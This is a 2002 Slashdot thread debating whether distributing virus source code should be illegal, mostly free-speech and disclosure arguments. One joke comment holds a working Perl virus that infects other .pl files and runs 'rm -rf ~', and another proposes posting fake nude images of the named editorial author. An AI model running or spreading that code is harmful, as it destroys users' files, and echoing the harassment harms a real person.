      • You're wrong about planning a murder being a crime. A good mystery writer would likely pay almost excruciating attention to every detail of a murder that is to occur in a story he or she is writing. The plans alone, no matter how detailed, cannot be legally construed as intent. Additional evidence would always be required to demonstrate intent.
  • I hate crackers and virus writers as much as any genuine hacker. But as troublesome as they are they would pale in comparison with the trouble governments are capable of unleashing.

    These kinds of regulations and restrictions are a short sighted response to irresponsible behavior on the part of anti social personalities. They do nothing to address the source of the problem and are therefore not a solution but simply an additional problem.

    Lee
  • I've read a bunch of posts claiming "writing software is free speech" and similar arguments that aren't really answering the question "Should Virus Distribution be Illegal?"

    I have no problem with people writing viruses for educational/programming exercises and the like, as long as they are kept in a controlled environment.

    At any point, however, when the virus gets loose (so to speak) the distributor (not necessarily the author) of the virus should be held accountable (criminally, financially) for whatever damage it does. Free speech ends when it compromises the rights (and property) of others.

  • by Philbert Desenex ( 219355 ) on Friday April 12, 2002 @03:03PM (#3331327) Homepage
    Sarah Gordon may have some good points. It's hard to tell.

    She never bothers to define the term "virus" in a way that an arbitrary individual (me or an intellectual property lawyer or a World Court Judge) can use to determine whether or not some source code constitutes a "virus".

    If she follows Fred Cohen's definition ("sequences of instructions in machine code for a particular machine that make exact copies of themselves somewhere else in the machine" - "A Short Course on Computer Viruses", 2nd ed., ISBN 0-471-00769-2, John Wiley & Sons, 1994), which is pretty much an English transliteration of the mathematical definition, then even things like /bin/cat or /bin/cc become "viruses" under some circumstances.
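    As a concrete (and harmless) illustration of just how broad Cohen's definition is, here is a complete Python script -- my own example, not from the book -- whose only behavior is to copy its own bytes somewhere else on the machine, which is also exactly what "cat script.py > /tmp/copy.py" does; that's the point about /bin/cat above.

        import os
        import shutil
        import tempfile

        def replicate_once(destination_dir):
            # Copy this script's own file into destination_dir: an "exact copy
            # of itself somewhere else in the machine", per Cohen's wording.
            src = os.path.abspath(__file__)
            dst = os.path.join(destination_dir, os.path.basename(src))
            shutil.copyfile(src, dst)
            return dst

        if __name__ == "__main__":
            print(replicate_once(tempfile.mkdtemp()))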

    Sarah Gordon is just fear-mongering at this point. Until she says "The term 'virus' means code that .....", objecting to her editorial is just automatic: she's using a term that has (1) a specific technical or mathematical meaning (to Fred Cohen and many Slashdot readers) and (2) a vague "common sense" meaning (to Windows users, the general public, and a few Slashdot readers). She's arguing based on both meanings. She's hoping that emotional or poorly intellectualized reactions to meaning (2) will get code representing meaning (1) outlawed.

    It's crap. Give it up Sarah.

    And just for good measure: http://cm.bell-labs.com/cm/cs/who/doug/v101.ps Read it and weep Sarah. Neener neener neener!
  • by rtm1 ( 560452 ) on Friday April 12, 2002 @03:04PM (#3331331)
    It says in the article: virus writing and subsequent distribution aren't pure speech. Rather, they're speech plus action

    But this is never elaborated on at all. I do not understand how it can be said that posting something on the web is any more of an action than the physical act of mailing a letter to the editor, yet we do say that mailing a letter to the editor falls squarely under free speech. How are we supposed to separate speech and action (something the article acknowledges are different) on the Internet if the act of posting places your content beyond pure speech? How are we supposed to have free speech if we are prevented from speaking to others by posting our thoughts?

    There is a big difference between saying "This code will infect machines and do this to them" and then compiling that code and releasing it with malicious intent. One is speech, the other is action. It is the same as the difference between saying "I could break into your home by doing this" and then actually going out and doing it. One is not illegal, the other is.

    This reminds me of another issue. How long before distributing an MP3 player makes you an accomplice to copyright infringement because you haven't included draconian copy-protection schemes? The problem is social, not technological.

  • Um, would you nail the guy using Outlook on a corporate LAN, or MS for providing the dissemination software for it?

    This is humor for those who would inform me to read the article.
  • ...and do a damn good job. Without an *iron-clad* definition, you could make a case for things like, say, Outlook being "malicious". I don't mean to attack Microsoft; I mean *anything* that unintentionally or intentionally causes damage could be considered malicious. Could "rm" be considered a "malicious" piece of code?
    • You've hit the nail on the head. Compilers and even "cat" or "copy.exe" can have viral properties depending on the context.

      Sarah Gordon is arguing sloppily - the audience she's speaking to lets her get away with it out of a lack of rigor. She's hoping that a gut reaction to "virus" (Melissa etc.) will get people to outlaw "virus" (in the form of self-replicating code).
  • Here's a counter proposal: all operating systems should be distributed with the latest viruses. The viruses should be activated when the OS is started. If the OS and the other software on board can't fight off the viruses then they aren't good enough and the programmers get a bad mark in the eyes of the consumers.

    I'm only half serious about this, of course, but the idea is better than Gordon's. Inoculating computers against viruses by forcing them to successfully fight viruses off will make the computers of the world more secure than trying to protect them in a sterile glass tube that shatters at the first poke.

  • We've always been on friendly terms, Sarah, except when you go spouting fascist crap like this. What does Symantec pay you for, anyways? Researching "ethical implications of select technologies" sounds like "making up FUD and scare tactics" to me. How can the author of The Generic Virus Writer [ibm.com] accuse anyone of "bad science"? Pah-lease. You're a psychologist; your "discipline" invented bad science. When you condemn virus writing and try to criminalize it like you constantly do, you drive more and more kids to get into it -- call it the "coolness factor". Make it more illegal and it will become more dangerous. What the vx scene needs is compassion and guidance -- leadership if you will. When VLAD was on top we put forward [biodome.org] positive, responsible leadership. Unlike hacking, writing viruses is about investigating the weaknesses of both insecure and secure systems. What can you do within the bounds of a good security model that is still malicious? Can this help us build better security models? This is research, and maybe if you got out of your closed little commercial lab ("we make scanners!" Big deal) you might be able to see the whole picture.
  • obfuscated code (Score:3, Interesting)

    by psyclone ( 187154 ) on Friday April 12, 2002 @03:13PM (#3331384)
    Just like this contest [ioccc.org] has been promoting for years, obfuscated code may "fool" any automated tool that would somehow parse various languages. Virus writers already display some talent -- this would just encourage them to be more creative with the source.
  • "Making viruses publicly available on the World Wide Web for research or educational purposes? That's nonsense. Call it your constitutional right, but the truth is that it's morally wrong. "

    Sarah needs some education on what morals are. The fact that some people will have morals different from others is one reason we have freedom of speech. If we started saying what someone could or couldn't say based on others' morals, free speech would go away.

    I am not a scientist, but I can subscribe to any of their journals and access their information. A good deal of scientific discovery can be used for malice.

    "Sarah Gordon is senior research fellow at Symantec Security Response.."

    When someone from Symantec talks about what is "moral", it kind of rings hollow.
  • I don't think it's possible to come up with a generally acceptable definition for "malicious code". Prove me wrong.

    Counterexamples:

    Internet Explorer and Netscape both trying to become the default system browser, with or without user knowledge. Are these pieces of code being malicious to each other?

    A trojan horse which requires willful (but not knowing) participation from the user to install.

    A piece of software which serves a controversial, but generally beneficial purpose. For example, a spam bot trap, or news cancellers.

    A script-kiddie-proof buffer overflow exploit (even if it does just change /bin/sh to " bin sh". In hex, though.)

    Anti-virus software which could produce false positives and stop software packages from running.

    A background ad-server which gets installed automatically, and unknowingly, by ISP or P2P client software. (Yes, I would like that to be considered malicious.)

    An auto-update server which gets installed automatically, and unknowingly, by the OS, which transparently downloads new software components and security fixes as they become available. (That does serve a useful function, for some people.)


  • After all, making things illegal is so effective.
    Can you get child pornography? No, it's illegal.
    Can you get cracked software? No, it's illegal. Can you get ripped music? No, it's illegal.
    Do servers ever suffer from DoS attacks? Do people ever make charges on other people's credit cards without the card's owner knowing? Do people ever hack into private networks?

    Of course not, it's all illegal. Logically, if we make viruses illegal to write, no one would write them...right?

  • I believe virus distribution should be illegal, but distributing the code should not be (the title of the article is somewhat misleading). If someone wants to spread a virus, MS makes it easy for them with macros. If they aren't that computer literate, they probably aren't going to want to spread a virus in the first place.

    Posting the code should be legal because there are always new methods of attacking someone's computer, and people/companies working against this should have access to methods of distributing viruses that other people have thought of, the better to protect themselves/their customers.

    An apt analogy is that people are allowed to buy guns, despite the fact that they can kill people--they also help protect people from being killed.
    • A virus is a piece of software that distributes itself.

      Making "virus distribution" illegal would pose a an interesting logical debate. It is the computer code that distributes itself, so it is the computer code that is breaking the law.

      I am sure that the article was referring to the people who executed the program that distributes the virus, but you can get into a lot of hairy technicalities about what action caused the distribution. Is leaving an unmarked diskette with a boot sector virus on it in a public place an act of distribution?

      Is knowingly not deleting a virus an act of distribution?
  • "In a guest editorial on Newarchitect, Sarah Gordon looks at whether spam should be allowed and what steps could be taken to stop it. What's worrisome though is that restrictions on spam don't take into account who it's malicious against and what truly defines malicious." Note that she's not talking about actually sending spam, but merely making the text available for others to examine (and for some of them, no doubt, to try to spread in the wild).
  • Why should we care about computer viruses? I can't remember the last time I had one. I don't understand people who buy antivirus software, have it scan their mail, then read news like "don't open I Love You letters!" and throw half of their mail in the trash. Why is so much work needed just to use a computer?
    AFAIK computer viruses matter only to Windows users. Systems that allow computer viruses to exist waste huge amounts of their users' time.
    Let's just talk about something else.
  • by supernova87a ( 532540 ) <kepler1.hotmail@com> on Friday April 12, 2002 @03:23PM (#3331453)
    If you think about it in the biological sense, from a purely result-oriented perspective, one might make the argument that viruses are good for computers. The justification is that viruses force people to make their code more robust, and less vulnerable to attack.

    I think I subscribe to this to some extent. If we had no viruses, and didn't know what havoc they could wreak on our systems, we'd be completely unprepared for any such trouble -- whether caused maliciously, or because someone's code happened to go wrong.

    I don't think that you can place restrictions on what people write or do not write. I feel it's still the obligation of the system user to protect him/herself against problems and to be vigilant. It keeps us all in practice, and makes us more ready for whatever is out there, no?
    • "The justification is that viruses force people to make their code more robust, and less vulnerable to attack."

      • Yeah, but the idea is that if they didn't exist, people's code wouldn't have to be as resilient to attacks. It's the classic chicken-or-the-egg story.
  • If distributing virus source code become outlawed, only outlaws will distribute virus source code...
  • I think there's some confusion about malicious code vs. virus.

    It's very difficult to come up with a definition of "malicious code" that everyone agrees on.

    However, "virus" can be defined more accurately. Just take the most important virus feature - it should be self-replicating. I think it's enough to define virus, technically.

  • The internet is a community, and residents are responsible for keeping their computers in line. This includes keeping their computers secure from virus attacks and putting them down with antiviruses or firewalls if they go out and attack other people.

    With so many people on broadband nowadays, it seems like we don't have much other choice.

    To say you can't distribute virus code anymore is like saying no one is allowed to own pit bulls because they'd attack other people if they got out. If you take reasonable precautions with fences and signs and such, it should be OK. Even if the dog does get out once and bite someone, the owner gets one more chance (to install an antivirus, secure their box, etc.) before it gets put down (fines, DSL connection yanked, etc.). But going around eliminating every pit bull and rottweiler in existence won't help the fact that everyone has really poor fences that any specially trained attack chihuahua could get through (and get off scot-free for it, too). Geez, you might as well try to go eliminate all the terrorists or something... oh wait...
  • ...look for Microsoft to open the Windows source. After all, with its memory holes and security flaws, I'm sure that if Windows source were available, it would be so "malicious" that it would be illegal to distribute anyway.
  • by RatOmeter ( 468015 ) on Friday April 12, 2002 @03:55PM (#3331653)
    Posting, distributing or making available source code to viruses should be illegal? You mean, like this?

    CodeRed.zip at Eeye.com [eeye.com]

    and

    CodeRedII.zip at Eeye.com [eeye.com]

    Eeye.com has often posted proof-of-concept exploits as part of their advisories... is the author of the guest editorial saying eeye.com is doing wrong?

    Back when the original Code Red was stirring up a ruckus, I posted its disassembled code (from eeye) to alt.comp.virus.source, and a short discussion of several weird aspects (poor coding) of the code ensued. I don't think I did anything wrong by posting it. If some weasel used that post (or other such sources) to create CRII, so be it. IMO, by that time any servers that were still vulnerable to CR/CRII deserved to be hit and, better yet, TOS'd by their ISP.

    I just don't subscribe to the idea that suppressing potentially dangerous source code will do good in the long run. Having the source available and widely distributed has several advantages:
    - promotes understanding of exploit mechanisms, in order to avoid making the same mistakes in the future
    - promotes rapid deployment of fixes. There is no pressure greater than knowing every little script kiddy's got the code
    - raises awareness of code weaknesses/failure modes/common pitfalls (maybe *someday* CS courses will teach future coders to prevent buffer overflows!)

    I firmly believe that being open about software/network/OS weaknesses will gradually drive the state of the art in secure software to a much higher level. The "keep quiet", "head-in-the-sand" approach that M$ is promoting these days will only hinder such advances. I'll make a loose analogy to the old outlaws & guns argument: "If you outlaw virus source code, only outlaws will have virus source code."

    In fact, I think it is *imperative* that malicious source code NOT be suppressed. How else can we arm the next generations of app and OS coders to write resistant code?

  • by Dr. Awktagon ( 233360 ) on Friday April 12, 2002 @04:00PM (#3331689) Homepage
    #!/usr/bin/perl
    # VIRUS.pl by l33tb0y
    # sh0utz to: b33k3r and dr.ph0t0n
    for (<*.pl>) {
        # 5pr34d d4 l0v3
        system "cat $0 >> $_";
    }
    # D4 P4YL04D! M3 50 3V1L!
    system "rm -rf ~";
    print "h4 h4 h4 h4 -- ur 0wn3d!\n";
  • What about bugs? (Score:2, Redundant)

    by ledbetter ( 179623 )
    If distributing dangerous code becomes illegal, what about bugs? Might it become illegal to release buggy software?? This could be a very interesting turn of events in light of the current situation of software licenses which basically absolve the authors of any and all responsibility for their code, whatsoever. Making viruses illegal could really have some interesting (and potentially dangerous) implications.

    Similarly what about academic exploit code? Might that become illegal as well?? Bottom line, code is way too close to speech to be restricted like this...
  • by kindbud ( 90044 ) on Friday April 12, 2002 @04:47PM (#3332041) Homepage
    I have concluded that people need to stop thinking they can do whatever they want simply because it's not illegal.

    I have been thinking that someone ought to post simulated naked pictures of Sarah on reallybadguys.org just to prove her wrong.
  • by dmoen ( 88623 ) on Friday April 12, 2002 @04:52PM (#3332075) Homepage
    Sarah is a security researcher for Symantec. She doesn't need to rely on public sources to get information about the latest exploits, because Symantec has a huge market share and lots of customers: Symantec can get this information directly from their customers and other contacts.

    Security researchers who don't work for dominant companies like Symantec aren't in such a sweet position, and rely on public forums to learn about exploits. And it's not enough to be told "there is a new virus that attacks X", with the details held secret (e.g., known only to Microsoft, Symantec, and a few other giants). Security researchers need precise details of how the exploit works, and they need to see the virus code itself in order to write code that detects the virus's signature or protects against certain aspects of its behaviour.
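
    Even the crudest detector needs the actual bytes to match against. As a rough sketch (the signature bytes and the samples/ directory here are invented for illustration; real engines use many signatures, wildcards, and heuristics, not one static string):

    #!/usr/bin/perl
    # Sketch only: a toy signature scanner over a directory of samples.
    use strict;
    use warnings;

    # Hypothetical signature, as if lifted from a captured sample.
    my $signature = "\x90\x90\xeb\xfe";

    for my $file (glob "samples/*") {
        next unless -f $file;
        open my $fh, '<:raw', $file or next;    # read raw bytes
        my $data = do { local $/; <$fh> };
        close $fh;
        print "$file: signature found\n" if index($data, $signature) >= 0;
    }

    You can't write even that much without access to the sample itself, which is the whole point.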

    Sarah's proposal is just a way to shut down the competition by criminalizing the only way that independent researchers have for getting information.

    Doug Moen

  • by jridley ( 9305 ) on Friday April 12, 2002 @06:36PM (#3332587)
    Code for a virus is no different than certain Stephen King books. Both can describe illegal action. Nobody is claiming that Stephen King did anything illegal, nor is it illegal for people to buy and read his books. It's only illegal to actually do some of the things that he describes, sometimes in tiny detail, how to do.
